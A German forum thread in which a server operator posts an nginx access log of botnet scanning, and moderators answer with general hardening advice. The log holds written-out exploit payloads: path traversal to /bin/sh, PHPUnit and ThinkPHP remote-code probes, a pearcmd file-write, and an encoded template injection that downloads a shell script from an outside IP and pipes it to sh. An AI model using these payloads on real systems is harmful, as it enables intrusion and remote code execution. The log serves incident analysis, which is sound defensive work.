+ Reply to Thread
Results 1 to 4 of 4

Thread: Ngnix

  1. #1

    Join Date
    10.11.07
    P2P Client
    BiglyBT Extreme Mod
    Posts
    229
    Activity Longevity
    1/20 20/20
    Today Posts
    0/5 ssssss229

    Ngnix

    Kann mir jemand weiterhelfen? Ich habe gestern und heute den nginx access.log überprüft und dabei etwas Verdächtiges entdeckt. Es scheint, dass eine oder mehrere fremde IP versucht haban, auf den Server zuzugreifen oder bereits zugegriffen hat.
    hier ist access.log

    34.76.96.55 - - [22/Mar/2024:00:40:30 +0100] "GET / HTTP/1.1" 301 162 "-" "python-requests/2.31.0"
    149.50.103.48 - - [22/Mar/202427:08 +0100] "GET / HTTP/1.1" 301 162 "_"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
    91.232.195.48 - - [22/Mar/202458:55 +0100] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
    104.199.31.214 - - [22/Mar/2024:02:48:16 +0100] "GET / HTTP/1.1" 302 199 "-" "python-requests/2.31.0"
    47.254.251.235 - - [22/Mar/2024:02:57:11 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-"
    47.254.251.235 - - [22/Mar/2024:02:57:18 +0100] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-"
    47.254.251.235 - - [22/Mar/2024:02:57:25 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:26 +0100] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:27 +0100] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:28 +0100] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:29 +0100] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:30 +0100] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:32 +0100] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:35 +0100] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:38 +0100] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:41 +0100] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:42 +0100] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:45 +0100] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:47 +0100] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:50 +0100] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:53 +0100] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:54 +0100] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:55 +0100] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:57:57 +0100] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:01 +0100] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:02 +0100] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:05 +0100] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:07 +0100] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:09 +0100] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:12 +0100] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:19 +0100] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:21 +0100] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:22 +0100] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:24 +0100] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:27 +0100] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:30 +0100] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:33 +0100] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:48 +0100] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:51 +0100] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:52 +0100] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:55 +0100] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:58 +0100] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:58:59 +0100] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:59:02 +0100] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:59:05 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/var/tmp/index1.php HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:59:08 +0100] "GET /index.php?lang=../../../../../../../../var/tmp/index1 HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:59:10 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"
    47.254.251.235 - - [22/Mar/2024:02:59:14 +0100] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d% 61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74 %69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%6 5%77%28%29%28%22%77%67%65%74%20%68%74%74%70%3a%2f% 2f%31%38%35%2e%32%31%36%2e%37%30%2e%31%33%38%2f%76 %6d%2e%73%68%20%2d%4f%2d%20%7c%20%73%68%3b%20%63%7 5%72%6c%20%68%74%74%70%3a%2f%2f%31%38%35%2e%32%31% 36%2e%37%30%2e%31%33%38%2f%76%6d%2e%73%68%20%7c%20 %73%68%22%29%7d HTTP/1.1" 404 207 "-" "Custom-AsyncHttpClient"

    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "GET http://www.p2p-network.net/proxycheck.txt HTTP/1.0" 301 162 "-" "BOPM/3.1.3"
    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "CONNECT 96.43.143.155:80 HTTP/1.0" 400 150 "-" "-"
    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "CONNECT 96.43.143.155:80 HTTP/1.0" 400 150 "-" "-"
    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "POST http://96.43.143.155:80/ HTTP/1.0" 301 162 "-" "-"
    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "\x04\x01\x00P`+\x8F\x9B\x00" 400 150 "-" "-"
    96.43.143.154 - - [23/Mar/2024:15:59:37 +0100] "\x05\x01\x00" 400 150 "-" "-"
    Last edited by --->HDBD<---; 25.03.24 at 07:56.
    Reply With QuoteReply With Quote
    Thanks

  2. #2
    Moderator anon's Avatar
    Join Date
    01.02.08
    Posts
    39,428
    Activity Longevity
    7/20 19/20
    Today Posts
    1/5 ssss39428
    If you leave a service exposed to the Internet, it's guaranteed to be scanned and attacked by botnets eventually. You can't prevent that, but you can secure your server so that they find as little of value as possible. Depending on the size and budget of your project(s), a WAF may also be worth looking into.
    "I just remembered something that happened a long time ago."
    Reply With QuoteReply With Quote
    Thanks

  3. #3
    Moderator
    Instab's Avatar
    Join Date
    17.09.09
    Posts
    6,661
    Activity Longevity
    5/20 17/20
    Today Posts
    0/5 sssss6661
    Code:
    47.254.251.235 - - [22/Mar/2024:02:59:05 +0100] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/var/tmp/index1.php
    schau in /var/tmp ob es diese index1.php datei gibt. wenn ja, hat der hack geklappt und du solltest deine index.php besser absichern.
    Your account has been disabled.
    Reply With QuoteReply With Quote
    Thanks

  4. #4

    Join Date
    10.11.07
    P2P Client
    BiglyBT Extreme Mod
    Posts
    229
    Activity Longevity
    1/20 20/20
    Today Posts
    0/5 ssssss229
    @Instab

    Vielen Dank. Ich habe in /var/tmp nachgesehen. Nein, eine solche Datei existiert nicht.

    Abgesehen von einer WAF, welche anderen Möglichkeiten gibt es noch?
    Last edited by --->HDBD<---; 24.03.24 at 14:37.
    Reply With QuoteReply With Quote
    Thanks

+ Reply to Thread

Tags for this Thread

Posting Permissions

  • You may post new threads
  • You may post replies
  • You may not post attachments
  • You may not edit your posts
  •